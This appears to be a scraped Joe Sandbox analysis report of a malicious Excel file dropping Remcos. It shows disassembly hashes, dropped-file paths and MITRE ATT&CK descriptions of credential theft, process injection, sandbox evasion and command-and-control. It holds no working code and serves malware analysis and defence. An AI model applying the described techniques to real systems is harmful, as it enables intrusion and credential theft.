Associated: 0000000B.00000002.457293519.000000000131E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457299222.0000000001327000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1260000_name.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 9b0400dc3cb3a639f51e38f68e39ffd422f2c915ddacbf348326da9e81a79ff5
Instruction ID: cb569573328096bdf84a6f59939097da152b6528ea68d54488404031f80e2978
Opcode Fuzzy Hash: 9b0400dc3cb3a639f51e38f68e39ffd422f2c915ddacbf348326da9e81a79ff5
Instruction Fuzzy Hash: 2AF0C231932287EBEF21BF748C047BFB6A1AF20325F448514E524AB1D0D7B88950DF51

Function 01280911 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00007FFF,?,?,?,0126741D,00000001,01326290,?,01263BCD,013252F8,013252E0,?,?), ref: 01280930

Part of subcall function 01267D2C: _memmove.LIBCMT ref: 01267D66

Memory Dump Source

Source File: 0000000B.00000002.457263724.0000000001261000.00000020.00000001.01000000.00000006.sdmp, Offset: 01260000, based on PE: true

Associated: 0000000B.00000002.457258762.0000000001260000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457280607.00000000012EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457280607.0000000001314000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457293519.000000000131E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.457299222.0000000001327000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1260000_name.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: 9985b7ff24318cf696db66883e1b319c5513cba09ac2a8ced00b2f3c16b8a4bd
Instruction ID: aa86b554de6bdc6436a7305f71df08904f7180080c8b2252fdff3d6db41250b2
Opcode Fuzzy Hash: 9985b7ff24318cf696db66883e1b319c5513cba09ac2a8ced00b2f3c16b8a4bd
Instruction Fuzzy Hash: 4FE0CD3790012957C720D55CAC05FFA77EDDF886A0F0401B5FD0CD7248DA649C918690

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Containers, IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PO-00006799868.xls

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Remcos

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Exploits

System Summary

Data Obfuscation

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\json[1].json

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\wecreatednewthigsforsuccessfulljournecyr________verynicepeoplesetirethigstogoformegreat________________nnicwaytoentreithigntochangewithmegreat[1].doc

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\taskhostw[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\10EEF389.emf

Windows Analysis Report
PO-00006799868.xls

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\wecreatednewthigsforsuccessfulljournecyrverynicepeoplesetirethigstogoformegreat________nnicwaytoentreithigntochangewithmegreat[1].doc

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre